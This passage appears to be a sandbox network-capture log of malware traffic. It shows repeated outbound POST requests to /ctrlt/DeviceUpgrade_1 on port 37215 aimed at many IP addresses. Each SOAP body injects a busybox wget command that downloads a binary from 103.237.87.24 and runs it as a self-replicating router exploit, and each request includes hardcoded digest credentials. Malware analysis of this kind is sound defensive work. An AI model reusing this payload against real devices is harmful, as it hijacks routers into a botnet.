2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1350192.168.2.135046841.87.35.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457869053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1351192.168.2.1357988157.58.132.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457887888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1352192.168.2.134515841.39.0.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457905054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1353192.168.2.13461581.91.137.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457912922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1354192.168.2.1358086197.213.81.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457993031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1355192.168.2.1336568131.214.131.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.458019018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1356192.168.2.1347454157.196.212.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.458298922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1357192.168.2.1349004197.128.104.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.458343029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1358192.168.2.1337176197.42.73.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.458352089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1359192.168.2.1355172157.114.111.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.458359003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1360192.168.2.1350298161.171.16.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.459028959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
